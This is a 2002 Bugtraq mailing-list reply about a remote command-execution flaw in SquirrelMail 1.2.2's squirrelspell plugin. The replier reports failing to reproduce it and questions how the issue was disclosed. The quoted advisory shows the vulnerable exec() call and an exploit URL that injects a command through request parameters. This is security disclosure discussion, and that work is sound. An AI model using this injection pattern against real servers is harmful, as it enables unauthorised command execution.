[23981] in bugtraq
Re: squirrelmail bug
daemon@ATHENA.MIT.EDU (Adam Herscher)
Thu Jan 24 17:35:46 2002
Date: Thu, 24 Jan 2002 13:31:26 -0800 (PST)
From: Adam Herscher <adam@xtime.com>
To: appelast@bsquad.sm.pl
Cc: bugtraq@securityfocus.com, squirrelmail-pl@maciejka.net
In-Reply-To: <45772BAD0AD07145A9D8E522C6F05101010C8970@axis.pacc.com>
Message-ID: <Pine.GSO.4.10.10201241329200.26161-100000@sundev1>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
I'm unable to repro on squirrelmail 1.2.2 + openbsd 2.9:
Fatal error: Call to undefined function: sqspell_getlang() in
/usr/local/www/htdocs/www2.axisproductions.com/webmail/plugins/squirrelspell/modules/check_me.mod.php
on line 59
I'm also curious how much notice this person gave to the Squirrelmail
development team to prepare a fix before releasing it to the world.. (same
thought applies to the random cross-scripting vulnerability just sent out
3 seconds ago)
On anothre note Squirrelmail 1.2.3 was released 01/21/02.. I was wondering
if anyone has had the opportunity to test against it. This specific issue
doesn't seem to have been noted in the changelog:
http://www.squirrelmail.org/changelog.php
Attempted to contact off-list earlier, but it seems the sender's mx is
having problems.
<appelast@bsquad.sm.pl>:
213.134.128.227 does not like recipient.
Remote host said: 550 5.7.1 <appelast@bsquad.sm.pl>... Relaying denied
Giving up on 213.134.128.227.
On Thu, 24 Jan 2002 appelast@bsquad.sm.pl wrote:
>
> Squirrelmail remote execute commands bug
>
> Version Affected :
> 1.2.2
>
> Squirrelmail is a webmail system, which allows users to send, get, read
> etc.
> mails. It has some themes, plugins etc. One of the plugins has a very
> interesting piece of code :
>
> from file check_me.mod.php :
>
> $sqspell_command = $SQSPELL_APP[$sqspell_use_app];
> ...
> $floc = "$attachment_dir/$username_sqspell_data.txt");
> ...
> exec ("cat $floc | $sqspell_command", $sqspell_output);
>
>
> Everything should be ok, but where this page includes config files,
> where
> are defined $attachment_dir and others ? Answer: Nowhere. We can set up
> variables $sqspell_command and $floc. Result ? We can execute any
> command
> of course as a http serwer owner.
>
> Exploit :
>
> host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wa
> ll%
> 20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=p
> lik
>
> <appelast@bsquad.sm.pl>
>
>
